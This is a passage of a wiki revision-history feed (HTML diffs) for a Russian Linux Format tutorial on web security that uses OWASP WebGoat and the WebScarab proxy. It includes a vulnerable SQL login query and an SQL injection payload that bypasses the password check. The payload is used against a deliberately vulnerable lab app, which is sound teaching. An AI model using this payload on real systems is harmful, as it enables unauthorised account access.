&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 92:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 93:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Select * from employee WHERE userid = ‘ + userid + ‘ and password = ‘ + password&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Select * from employee WHERE userid = ‘ + userid + ‘ and password = ‘ + password&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;background: #ffa; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Ес­ли этот за­прос воз­вра­ща­ет стро­ку, то поль­зо­ва­тель ввел вер­ный па­роль, и ему раз­ре­ша­ет­ся вой­ти в сис­те­му. Вве­ди­те имя поль­зо­ва­те­ля Neville Bartholomew и па­роль Test. Убе­ди­тесь, что WebScarab все еще пе­ре­хва­ты­ва­ет за­про­сы, и на­жми­те Login [Вой­ти]. Этот за­прос мож­но из­менить, до­ба­вив усло­вие OR (ИЛИ) ме­то­дом, ана­ло­гич­ным пре­ды­ду­ще­му уп­ражнению. Пе­ре­хва­тим HTTP-за­прос и из­меним по­ле па­ро­ля на&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Ес­ли этот за­прос воз­вра­ща­ет стро­ку, то поль­зо­ва­тель ввел вер­ный па­роль, и ему раз­ре­ша­ет­ся вой­ти в сис­те­му. Вве­ди­те имя поль­зо­ва­те­ля Neville Bartholomew и па­роль Test. Убе­ди­тесь, что WebScarab все еще пе­ре­хва­ты­ва­ет за­про­сы, и на­жми­те Login [Вой­ти]. Этот за­прос мож­но из­менить, до­ба­вив усло­вие OR (ИЛИ) ме­то­дом, ана­ло­гич­ным пре­ды­ду­ще­му уп­ражнению. &amp;#160;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&amp;#160;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;[[Файл: LXF159.tut_websec.owa_opt7.jpeg| left&amp;#160; |thumb|400px| &amp;gt; С по­мо­щью WebScarab мож­но ме­нять па­ра­мет­ры, от­прав­ляе­мые на сер­вер.&amp;#160; ]]&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&amp;#160;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&amp;#160;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&amp;#160;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Пе­ре­хва­тим HTTP-за­прос и из­меним по­ле па­ро­ля на&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Test’ OR password LIKE ‘%&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Test’ OR password LIKE ‘%&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Olkol</name></author>	</entry>

	<entry>
		<id>http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;diff=18005&amp;oldid=prev</id>
		<title>Olkol: /* Ата­куй­те и раз­ру­шай­те */</title>
		<link rel="alternate" type="text/html" href="http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;diff=18005&amp;oldid=prev"/>
				<updated>2018-09-25T05:10:56Z</updated>
		
		<summary type="html">&lt;p&gt;‎&lt;span dir=&quot;auto&quot;&gt;&lt;span class=&quot;autocomment&quot;&gt;Ата­куй­те и раз­ру­шай­те&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;table class='diff diff-contentalign-left'&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
			&lt;tr valign='top'&gt;
			&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;← Предыдущая&lt;/td&gt;
			&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;Версия 05:10, 25 сентября 2018&lt;/td&gt;
			&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 60:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 60:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|-&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|-&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|[[Файл: LXF159.tut_websec.owa_opt5.jpeg| center |thumb|300px| '''3 Ус­та­нов­ка до­полнений'''.&amp;gt; Зай­ди­те в Devices &amp;gt; Install Guest Additions [Уст­рой­ст­ва &amp;gt; Ус­та­но­вить госте­вые до­полнения]. Ес­ли вы­да­ет­ся со­об­щение об ошиб­ке, мо­жет по­на­до­бить­ся уста­нов­ка па­ке­та virtualbox-guest-additions в основ­ной сис­те­ме. На­жми­те OK для от­кры­тия ав­то­за­пуска, за­тем Run [За­пустить], и вве­ди­те owasp в ка­че­­ст­ве па­ро­ля. По­сле за­вер­шения уста­нов­ки пе­ре­за­пусти­те вир­ту­аль­ную ма­ши­ну. Те­перь мож­но раз­вер­нуть ок­но.&amp;#160; ]]&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|[[Файл: LXF159.tut_websec.owa_opt5.jpeg| center |thumb|300px| '''3 Ус­та­нов­ка до­полнений'''.&amp;gt; Зай­ди­те в Devices &amp;gt; Install Guest Additions [Уст­рой­ст­ва &amp;gt; Ус­та­но­вить госте­вые до­полнения]. Ес­ли вы­да­ет­ся со­об­щение об ошиб­ке, мо­жет по­на­до­бить­ся уста­нов­ка па­ке­та virtualbox-guest-additions в основ­ной сис­те­ме. На­жми­те OK для от­кры­тия ав­то­за­пуска, за­тем Run [За­пустить], и вве­ди­те owasp в ка­че­­ст­ве па­ро­ля. По­сле за­вер­шения уста­нов­ки пе­ре­за­пусти­те вир­ту­аль­ную ма­ши­ну. Те­перь мож­но раз­вер­нуть ок­но.&amp;#160; ]]&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;background: #ffa; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|[[Файл: LXF159.tut_websec.&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;owa_opt5&lt;/del&gt;.jpeg| center |thumb|300px| '''4 За­пуск про­кси'''.&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|[[Файл: LXF159.tut_websec.&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;owa_opt2&lt;/ins&gt;.jpeg| center |thumb|300px| '''4 За­пуск про­кси'''.&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Вы­бе­ри­те пункт ме­ню Applications &amp;gt; OWASP &amp;gt; Proxies &amp;gt; OWASP Web Scarab [При­ло­жения &amp;gt; Про­кси OWASP &amp;gt; OWASP Web Scarab]. За­пустит­ся про­кси. Вы­де­ли­те ему не менее 64 МБ. В окне Web Scarab вы­бе­ри­те Tools [Ин­ст­ру­мен­ты) и уста­но­ви­те га­лоч­ку Use Lite Interface [Ис­поль­зо­вать об­лег­чен­ный ин­тер­фейс]. За­тем вы­бе­ри­те пункт ме­ню Applications &amp;gt; OWASP &amp;gt; WebGoat START [При­ло­женияя &amp;gt; OWASP &amp;gt; ЗАПУСК WebGoat]. За­тем за­пусти­те Firefox.&amp;#160; ]]&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Вы­бе­ри­те пункт ме­ню Applications &amp;gt; OWASP &amp;gt; Proxies &amp;gt; OWASP Web Scarab [При­ло­жения &amp;gt; Про­кси OWASP &amp;gt; OWASP Web Scarab]. За­пустит­ся про­кси. Вы­де­ли­те ему не менее 64 МБ. В окне Web Scarab вы­бе­ри­те Tools [Ин­ст­ру­мен­ты) и уста­но­ви­те га­лоч­ку Use Lite Interface [Ис­поль­зо­вать об­лег­чен­ный ин­тер­фейс]. За­тем вы­бе­ри­те пункт ме­ню Applications &amp;gt; OWASP &amp;gt; WebGoat START [При­ло­женияя &amp;gt; OWASP &amp;gt; ЗАПУСК WebGoat]. За­тем за­пусти­те Firefox.&amp;#160; ]]&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|-&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|-&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;background: #ffa; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|[[Файл: LXF159.tut_websec.&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;owa_opt5&lt;/del&gt;.jpeg| center |thumb|300px| '''5 FoxyProxy'''.&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|[[Файл: LXF159.tut_websec.&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;owa_opt4&lt;/ins&gt;.jpeg| center |thumb|300px| '''5 FoxyProxy'''.&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;За­крой­те от­крыв­шее­ся по умол­чанию ок­но Firefox, за­тем вы­бе­ри­те пункт ме­ню Applications &amp;gt; OWASP &amp;gt; Firefox WTE style [При­ло­жения &amp;gt; OWASP &amp;gt; Firefox WTE] (это по­зво­ля­ет удобнее управ­лять про­кси). На­жми­те на FoxyProxy спра­ва внизу и из­мените ре­жим [Mode] на Use Proxy “WebScarab” for all URLs [Ис­поль­зо­вать про­кси WebScarab для всех ад­ре­сов]. ]]&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;За­крой­те от­крыв­шее­ся по умол­чанию ок­но Firefox, за­тем вы­бе­ри­те пункт ме­ню Applications &amp;gt; OWASP &amp;gt; Firefox WTE style [При­ло­жения &amp;gt; OWASP &amp;gt; Firefox WTE] (это по­зво­ля­ет удобнее управ­лять про­кси). На­жми­те на FoxyProxy спра­ва внизу и из­мените ре­жим [Mode] на Use Proxy “WebScarab” for all URLs [Ис­поль­зо­вать про­кси WebScarab для всех ад­ре­сов]. ]]&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;background: #ffa; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|[[Файл: LXF159.tut_websec.&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;owa_opt5&lt;/del&gt;.jpeg| center |thumb|300px|&amp;#160; '''6 Впе­ред!'''&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|[[Файл: LXF159.tut_websec.&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;owa_opt6&lt;/ins&gt;.jpeg| center |thumb|300px|&amp;#160; '''6 Впе­ред!'''&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;От­крой­те Firefox и на­бе­ри­те в ад­рес­ной стро­ке http://localhost:8080/WebGoat/attack, и вой­ди­те в сис­те­му с именем поль­зо­ва­те­ля и па­ро­лем guest. ]]&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;От­крой­те Firefox и на­бе­ри­те в ад­рес­ной стро­ке http://localhost:8080/WebGoat/attack, и вой­ди­те в сис­те­му с именем поль­зо­ва­те­ля и па­ро­лем guest. ]]&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|}&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|}&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Olkol</name></author>	</entry>

	<entry>
		<id>http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;diff=18002&amp;oldid=prev</id>
		<title>Olkol: /* Ата­куй­те и раз­ру­шай­те */</title>
		<link rel="alternate" type="text/html" href="http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;diff=18002&amp;oldid=prev"/>
				<updated>2018-09-25T05:07:00Z</updated>
		
		<summary type="html">&lt;p&gt;‎&lt;span dir=&quot;auto&quot;&gt;&lt;span class=&quot;autocomment&quot;&gt;Ата­куй­те и раз­ру­шай­те&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;table class='diff diff-contentalign-left'&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
			&lt;tr valign='top'&gt;
			&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;← Предыдущая&lt;/td&gt;
			&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;Версия 05:07, 25 сентября 2018&lt;/td&gt;
			&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 60:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 60:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|-&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|-&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|[[Файл: LXF159.tut_websec.owa_opt5.jpeg| center |thumb|300px| '''3 Ус­та­нов­ка до­полнений'''.&amp;gt; Зай­ди­те в Devices &amp;gt; Install Guest Additions [Уст­рой­ст­ва &amp;gt; Ус­та­но­вить госте­вые до­полнения]. Ес­ли вы­да­ет­ся со­об­щение об ошиб­ке, мо­жет по­на­до­бить­ся уста­нов­ка па­ке­та virtualbox-guest-additions в основ­ной сис­те­ме. На­жми­те OK для от­кры­тия ав­то­за­пуска, за­тем Run [За­пустить], и вве­ди­те owasp в ка­че­­ст­ве па­ро­ля. По­сле за­вер­шения уста­нов­ки пе­ре­за­пусти­те вир­ту­аль­ную ма­ши­ну. Те­перь мож­но раз­вер­нуть ок­но.&amp;#160; ]]&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|[[Файл: LXF159.tut_websec.owa_opt5.jpeg| center |thumb|300px| '''3 Ус­та­нов­ка до­полнений'''.&amp;gt; Зай­ди­те в Devices &amp;gt; Install Guest Additions [Уст­рой­ст­ва &amp;gt; Ус­та­но­вить госте­вые до­полнения]. Ес­ли вы­да­ет­ся со­об­щение об ошиб­ке, мо­жет по­на­до­бить­ся уста­нов­ка па­ке­та virtualbox-guest-additions в основ­ной сис­те­ме. На­жми­те OK для от­кры­тия ав­то­за­пуска, за­тем Run [За­пустить], и вве­ди­те owasp в ка­че­­ст­ве па­ро­ля. По­сле за­вер­шения уста­нов­ки пе­ре­за­пусти­те вир­ту­аль­ную ма­ши­ну. Те­перь мож­но раз­вер­нуть ок­но.&amp;#160; ]]&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;background: #ffa; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|[[Файл: LXF159.tut_websec.owa_opt5.jpeg| center |thumb|300px| '''&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;3 Ус­та­нов­ка до­полнений&lt;/del&gt;'''.&amp;gt; &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;Зай­ди­те в Devices &lt;/del&gt;&amp;gt; &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;Install Guest Additions &lt;/del&gt;[&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;Уст­рой­ст­ва &lt;/del&gt;&amp;gt; &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;Ус­та­но­вить госте­вые до­полнения&lt;/del&gt;]. &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;Ес­ли вы­да­ет­ся со­об­щение об ошиб­ке, мо­жет по­на­до­бить­ся уста­нов­ка па­ке­та virtualbox-guest-additions в основ­ной сис­те­ме&lt;/del&gt;. &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;На­жми­те OK для от­кры­тия ав­то­за­пуска, за­тем Run &lt;/del&gt;[&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;За­пустить], &lt;/del&gt;и &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;вве­ди­те owasp в ка­че­­ст­ве па­ро­ля&lt;/del&gt;. &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;По­сле за­вер­шения уста­нов­ки пе­ре­за­пусти­те вир­ту­аль­ную ма­ши­ну&lt;/del&gt;. &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;Те­перь мож­но раз­вер­нуть ок­но&lt;/del&gt;.&amp;#160; ]]&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|[[Файл: LXF159.tut_websec.owa_opt5.jpeg| center |thumb|300px| '''&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;4 За­пуск про­кси&lt;/ins&gt;'''.&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&amp;#160;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;Вы­бе­ри­те пункт ме­ню Applications &lt;/ins&gt;&amp;gt; &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;OWASP &amp;gt; Proxies &amp;gt; OWASP Web Scarab &lt;/ins&gt;[&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;При­ло­жения &lt;/ins&gt;&amp;gt; &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;Про­кси OWASP &amp;gt; OWASP Web Scarab&lt;/ins&gt;]. &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;За­пустит­ся про­кси&lt;/ins&gt;. &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;Вы­де­ли­те ему не менее 64 МБ. В окне Web Scarab вы­бе­ри­те Tools &lt;/ins&gt;[&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;Ин­ст­ру­мен­ты) &lt;/ins&gt;и &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;уста­но­ви­те га­лоч­ку Use Lite Interface [Ис­поль­зо­вать об­лег­чен­ный ин­тер­фейс]&lt;/ins&gt;. &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;За­тем вы­бе­ри­те пункт ме­ню Applications &amp;gt; OWASP &amp;gt; WebGoat START [При­ло­женияя &amp;gt; OWASP &amp;gt; ЗАПУСК WebGoat]&lt;/ins&gt;. &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;За­тем за­пусти­те Firefox&lt;/ins&gt;.&amp;#160; ]]&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|-&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|-&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;background: #ffa; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|[[Файл: LXF159.tut_websec.owa_opt5.jpeg| center |thumb|300px| '''&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;3 Ус­та­нов­ка до­полнений&lt;/del&gt;'''.&amp;gt; &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;Зай­ди­те в Devices &lt;/del&gt;&amp;gt; &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;Install Guest Additions &lt;/del&gt;[&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;Уст­рой­ст­ва &lt;/del&gt;&amp;gt; &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;Ус­та­но­вить госте­вые до­полнения&lt;/del&gt;]&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;. Ес­ли вы­да­ет­ся со­об­щение об ошиб­ке, мо­жет по­на­до­бить­ся уста­нов­ка па­ке­та virtualbox-guest-additions в основ­ной сис­те­ме&lt;/del&gt;. На­жми­те &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;OK для от­кры­тия ав­то­за­пуска, за­тем Run &lt;/del&gt;[&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;За­пустить&lt;/del&gt;]&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;, и вве­ди­те owasp в ка­че­­ст­ве па­ро­ля&lt;/del&gt;. &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;По­сле за­вер­шения уста­нов­ки пе­ре­за­пусти­те вир­ту­аль­ную ма­ши­ну. Те­перь мож­но раз­вер­нуть ок­но.&amp;#160; &lt;/del&gt;]]&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|[[Файл: LXF159.tut_websec.owa_opt5.jpeg| center |thumb|300px| '''&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;5 FoxyProxy&lt;/ins&gt;'''.&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;background: #ffa; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|[[Файл: LXF159.tut_websec.owa_opt5.jpeg| center |thumb|300px| '''&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;3 Ус­та­нов­ка до­полнений&lt;/del&gt;'''&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;.&amp;gt; Зай­ди­те &lt;/del&gt;в &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;Devices &amp;gt; Install Guest Additions [Уст­рой­ст­ва &amp;gt; Ус­та­но­вить госте­вые до­полнения]. Ес­ли вы­да­ет­ся со­об­щение об ошиб­ке&lt;/del&gt;, &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;мо­жет по­на­до­бить­ся уста­нов­ка па­ке­та virtualbox-guest-additions &lt;/del&gt;в &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;основ­ной сис­те­ме. На­жми­те OK для от­кры­тия ав­то­за­пуска, за­тем Run [За­пустить], &lt;/del&gt;и &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;вве­ди­те owasp в ка­че­­ст­ве па­ро­ля&lt;/del&gt;. &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;По­сле за­вер­шения уста­нов­ки пе­ре­за­пусти­те вир­ту­аль­ную ма­ши­ну. Те­перь мож­но раз­вер­нуть ок­но.&amp;#160; &lt;/del&gt;]]&lt;/div&gt;&lt;/td&gt;&lt;td 